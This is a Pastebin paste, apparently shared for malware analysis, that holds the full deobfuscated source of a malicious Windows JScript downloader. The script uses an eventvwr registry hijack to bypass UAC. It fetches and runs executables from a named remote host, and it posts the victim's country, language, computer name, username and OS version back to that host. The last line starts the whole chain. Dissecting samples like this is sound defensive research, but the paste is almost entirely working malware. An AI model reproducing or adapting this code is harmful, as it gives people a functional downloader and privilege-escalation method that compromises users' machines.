dissectmalware

Malicious JScript Downloader

May 5th, 2018
277
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. // This is malicious script do not run on a production machine
  2. // Original script: https://www.hybrid-analysis.com/sample/5ff0529719df26f5589074f5efab1aab0fdf8e514054d14c2ab04ecbb9683156?environmentId=100
  3.  
  4. // ########################### deobfuscated code ####################################
  5.  
  6. function _0xDF9B(_0xDF9B) {
  7.     try {
  8.         var _0xDFED = WScript.CreateObject("WScript.Shell");
  9.         _0xDFED.Run("REG ADD HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /t REG_SZ /d %temp%/Project1.exe /f");
  10.         WScript.Sleep(1000);
  11.         _0xDFED.Run("%SystemRoot%\\System32\\eventvwr.exe");
  12.         WScript.Sleep(60000);
  13.         _0xDFED.Run("REG DELETE HKCU\\Software\\Classes\\mscfile\\shell\\open\\command /ve /f")
  14.     } catch (e) {};
  15.     return false
  16. }
  17.  
  18. function _0xDFED(_0xE0E3, _0xDFED, _0xDF9B) {
  19.     try {
  20.         var _0xE03F = WScript.CreateObject("MSXML2.XMLHTTP");
  21.         _0xE03F.Open("GET", _0xE0E3 + "&=" + Math.floor((Math.random() * 999999999) + 1), false);
  22.         _0xE03F.SetRequestHeader("x-auth", _0xDFED);
  23.         _0xE03F.Send();
  24.         if (_0xE03F.Status == 200) {
  25.             var _0xE091 = WScript.CreateObject("ADODB.Stream");
  26.             _0xE091.Type = 1;
  27.             _0xE091.Open();
  28.             _0xE091.Write(_0xE03F.ResponseBody);
  29.             _0xE091.SaveToFile(_0xDF9B, 2);
  30.             _0xE091.Close();
  31.             return true
  32.         }
  33.     } catch (e) {};
  34.     return false
  35. }
  36.  
  37. function _0xE03F(_0xDF9B) {
  38.     try {
  39.         var _0xDFED = WScript.CreateObject("WScript.Shell");
  40.         return _0xDFED.RegRead("HKEY_CLASSES_ROOT\\\\CLSID\\\\" + _0xDF9B + "\\\\InprocServer32\\\\")
  41.     } catch (e) {};
  42.     return ""
  43. }
  44.  
  45. function _0xE091(_0xDF9B) {
  46.     try {
  47.         var _0xDFED = WScript.CreateObject("WScript.Shell");
  48.         return _0xDFED.RegRead("HKEY_CLASSES_ROOT\\\\Wow6432Node\\\\CLSID\\\\" + _0xDF9B + "\\\\InprocServer32\\\\")
  49.     } catch (e) {};
  50.     return ""
  51. }
  52.  
  53. function _0xE0E3(_0xDF9B) {
  54.     try {
  55.         var _0xDFED = WScript.CreateObject("Scripting.FileSystemObject");
  56.         return _0xDFED.FileExists(_0xDF9B)
  57.     } catch (e) {};
  58.     return false
  59. }
  60.  
  61. function _0xE135(_0xDF9B) {
  62.     try {
  63.         var _0xDFED = WScript.CreateObject("Scripting.FileSystemObject");
  64.         return _0xDFED.FolderExists(_0xDF9B)
  65.     } catch (e) {};
  66.     return false
  67. }
  68.  
  69. function _0xE187(_0xDF9B) {
  70.     try {
  71.         var _0xDFED = WScript.CreateObject("WScript.Shell");
  72.         return _0xDFED.ExpandEnvironmentStrings("%" + _0xDF9B + "%")
  73.     } catch (e) {};
  74.     return ""
  75. }
  76.  
  77. function _0xE1D9(_0xDFED) {
  78.     var _0xE091 = "";
  79.     var _0xE03F = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789";
  80.     for (var _0xDF9B = 0; _0xDF9B < _0xDFED; _0xDF9B++) {
  81.         _0xE091 += _0xE03F.charAt(Math.floor(Math.random() * _0xE03F.length))
  82.     };
  83.     return _0xE091
  84. }
  85.  
  86. function _0xE22B(_0xDF9B) {
  87.     try {
  88.         var _0xDFED = WScript.CreateObject("WScript.Shell");
  89.         _0xDFED.Run(_0xDF9B)
  90.     } catch (e) {}
  91. }
  92.  
  93. function _0xE27D(_0xE03F, _0xDF9B) {
  94.     try {
  95.         var _0xDFED = WScript.CreateObject("MSXML2.XMLHTTP");
  96.         _0xDFED.Open("GET", _0xE03F + "&=" + Math.floor((Math.random() * 999999999) + 1), false);
  97.         _0xDFED.SetRequestHeader("x-auth", _0xDF9B);
  98.         _0xDFED.Send();
  99.         if (_0xDFED.Status == 200) {
  100.             return _0xDFED.responseText
  101.         }
  102.     } catch (e) {};
  103.     return false
  104. }
  105.  
  106. function _0xE2CF(_0xDF9B, _0xE0E3) {
  107.     var _0xE03F = new ActiveXObject("Microsoft.XMLDOM");
  108.     var _0xE091 = _0xE03F.createElement("tmp");
  109.     _0xE091.dataType = "bin.base64";
  110.     _0xE091.text = _0xDF9B;
  111.     var _0xDFED = _0xE091.nodeTypedValue;
  112.     var _0xE135 = new ActiveXObject("ADODB.Stream");
  113.     _0xE135.Open();
  114.     _0xE135.Type = 1;
  115.     _0xE135.Write(_0xDFED);
  116.     _0xE135.SaveToFile(_0xE0E3, 2)
  117. }
  118.  
  119. function _0xE321() {
  120.     var _0xDFED = WScript.CreateObject("WScript.Shell");
  121.     var _0xDF9B = _0xDFED.RegRead("HKCU\\Control Panel\\International\\sCountry");
  122.     return _0xDF9B
  123. }
  124.  
  125. function _0xE373() {
  126.     var _0xDFED = WScript.CreateObject("WScript.Shell");
  127.     var _0xDF9B = _0xDFED.RegRead("HKCU\\Control Panel\\International\\sLanguage");
  128.     return _0xDF9B
  129. }
  130.  
  131. function _0xE3C5(_0xE091, _0xDF9B, _0xE03F) {
  132.     try {
  133.         var _0xDFED = WScript.CreateObject("MSXML2.XMLHTTP");
  134.         _0xDFED.Open("POST", _0xE091, false);
  135.         _0xDFED.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
  136.         _0xDFED.SetRequestHeader("x-auth", _0xDF9B);
  137.         _0xDFED.Send(_0xE03F);
  138.         if (_0xDFED.Status == 200) {
  139.             return _0xDFED.responseText
  140.         }
  141.     } catch (e) {};
  142.     return false
  143. }
  144.  
  145. function _0xE417() {
  146.     var _0xE135 = 0x10;
  147.     var _0xE0E3 = 0x20;
  148.     var _0xE091 = GetObject("winmgmts:\\\\.\\root\\CIMV2");
  149.     var _0xDF9B = _0xE091.ExecQuery("SELECT * FROM Win32_OperatingSystem", "WQL", _0xE135 | _0xE0E3);
  150.     var _0xDFED = new Enumerator(_0xDF9B);
  151.     var _0xE03F = _0xDFED.item();
  152.     return _0xE03F.Caption
  153. }
  154.  
  155. function _0xE469(_0xE03F, _0xDF9B) {
  156.     var _0xDFED = "country=" + _0xE321() + "&l=" + _0xE373() + "&c=" + _0xE187("COMPUTERNAME") + "&u=" + _0xE187("USERNAME") + "&s=" + _0xE417();
  157.     _0xE3C5(_0xE03F, _0xDF9B, _0xDFED)
  158. }
  159.  
  160. function _0xE4BB() {
  161.     var _0xDF9B = WScript.CreateObject("Scripting.FileSystemObject");
  162.     var _0xDFED = _0xE187("APPDATA") + "\\\\" + WScript.ScriptName;
  163.     return _0xDF9B.FileExists(_0xDFED) == false
  164. }
  165.  
  166. function _0xE50D() {
  167.     var _0xDF9B = WScript.CreateObject("Scripting.FileSystemObject");
  168.     var _0xDFED = _0xE187("APPDATA") + "\\\\" + WScript.ScriptName;
  169.     _0xDF9B.CreateTextFile(_0xDFED, true)
  170. }
  171.  
  172. function _0xE55F(_0xE3C5, _0xE2CF) {
  173.     try {
  174.         var _0xE373 = _0xE27D(_0xE3C5 + "?q", _0xE2CF);
  175.         if ((_0xE373 == "1") && (_0xE4BB())) {
  176.             var _0xE135 = WScript.CreateObject("Scripting.FileSystemObject");
  177.             var _0xE321 = _0xE187("APPDATA") + "\\\\" + _0xE1D9(6);
  178.             _0xE135.CreateFolder(_0xE321);
  179.             var _0xE091 = _0xE27D(_0xE3C5 + "?w", _0xE2CF);
  180.             if (_0xE091) {
  181.                 var _0xE0E3 = _0xE321 + "\\\\" + _0xE1D9(6) + ".exe";
  182.                 var _0xE03F = _0xDFED(_0xE3C5 + "?e", _0xE2CF, _0xE0E3);
  183.                 var _0xDF9B = _0xDFED(_0xE3C5 + "?r", _0xE2CF, _0xE321 + "\\\\" + _0xE091);
  184.                 if (_0xE03F && _0xDF9B) {
  185.                     _0xE22B(_0xE0E3);
  186.                     _0xE469(_0xE3C5 + "?t", _0xE2CF);
  187.                     _0xE50D()
  188.                 }
  189.             }
  190.         }
  191.     } catch (e) {}
  192. }
  193. runAsAdmin = _0xDF9B;
  194. dlToFile = _0xDFED;
  195. getPathFromGuid = _0xE03F;
  196. getPathFromGuidWow = _0xE091;
  197. fileExists = _0xE0E3;
  198. folderExists = _0xE135;
  199. getEnv = _0xE187;
  200. randomStr = _0xE1D9;
  201. runAsUser = _0xE22B;
  202. dlToText = _0xE27D;
  203. base64ToBinary = _0xE2CF;
  204. getCountryName = _0xE321;
  205. getLanguage = _0xE373;
  206. dataPost = _0xE3C5;
  207. getSO = _0xE417;
  208. SendInfect = _0xE469;
  209. Prosseguir = _0xE4BB;
  210. Marcar = _0xE50D;
  211. Arrochar = _0xE55F;
  212. _0xE55F("https://pnl-01start.com/", "padrao")
Add Comment
Please, Sign In to add comment